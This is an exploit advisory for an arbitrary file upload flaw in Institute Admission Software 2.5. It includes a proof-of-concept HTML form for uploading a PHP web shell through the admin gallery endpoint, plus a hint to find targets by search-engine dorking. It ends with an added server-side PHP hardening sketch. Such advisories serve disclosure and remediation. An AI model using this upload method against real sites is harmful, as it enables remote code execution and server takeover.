=============================================================================================================================================
| # Title : Institute Admission Software 2.5 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://softmaart.com/institute-admission-software.php |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] summary : This vulnerability affects Institute Admission Software v2.5, where the application fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel.
An attacker can exploit this weakness by directly submitting a crafted multipart/form-data POST request to the vulnerable endpoint, allowing the upload of arbitrary executable files instead of legitimate images.
Due to the absence of strict server-side file type validation, content inspection, and execution controls,
a malicious file (e.g. PHP web shell or executable payload) can be successfully uploaded to the publicly accessible /uploads/ directory.
Once uploaded, the attacker may directly access the file via the browser, potentially leading to Remote Code Execution (RCE) on the target server.
[+] Impact includes:
Arbitrary file upload
Remote command execution
Full web application compromise
Possible server takeover depending on permissions
[+] Root Cause:
Missing MIME-type and extension validation
No server-side file execution restrictions
Insecure upload directory exposure
[+] Severity: High
Attack Vector: Remote / Unauthenticated (depending on admin access exposure)
This issue highlights a critical failure in secure file handling practices and emphasizes the necessity of enforcing strict upload validation, randomized file naming, execution blocking, and proper access controls.
[+] The following HTML code uploads an executable malicious file remotely.
[+] Save code as : poc.html
[+] Line 01 : set your target
[+] Link to the uploaded files : /uploads/
[+] use payload :
<form action="http://127.0.0.1/gpgcgairsain.ac.in/admin_panel/gallery.php?id=19" method="POST" enctype="multipart/form-data">
<label for="event">Event:</label>
<select name="event" id="event">
<option value="19">Hindi Departmental Programme</option>
<!-- You can add event options here -->
</select>
<br><br>
<label for="photo">Photo:</label>
<input type="file" name="photo" id="photo" accept="image/*">
<br><br>
<input type="hidden" name="db_photo" value="">
<input type="submit" name="submit" value="Upload">
</form>
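[+] Server-side handling that applies the controls named in the summary (content-based type validation, randomized file naming, storage outside an executing path), as an added example that is not the vendor's code or part of the original advisory. The field name "photo" comes from the form above; the function name, storage path, size cap and allow-list are assumptions.

```php
<?php
// Added hardening sketch, not the vendor's code. The field name "photo" is
// taken from the form above; everything else here is an assumption.
declare(strict_types=1);

const ALLOWED_TYPES = [            // server-detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES  = 5 * 1024 * 1024;               // assumed size cap
const UPLOAD_DIR = '/var/www/app-data/gallery';   // assumed: outside any PHP-executing path

function store_gallery_photo(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('bad size');
    }
    // Detect the type from file content; the client-supplied name and
    // Content-Type are never trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }
    // Random server-side name with our own extension: a file that passes the
    // image checks but carries script content still cannot be stored as .php.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('store failed');
    }
    return $name;   // persist this name in the gallery record
}

// Run only after the admin session has been verified (auth check not shown).
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['photo'])) {
    try {
        $stored = store_gallery_photo($_FILES['photo']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Upload rejected');
    }
}
```

The storage directory should additionally be configured in the web server so that script handlers are disabled for it, since content checks alone do not stop a valid image that also contains script code.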
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================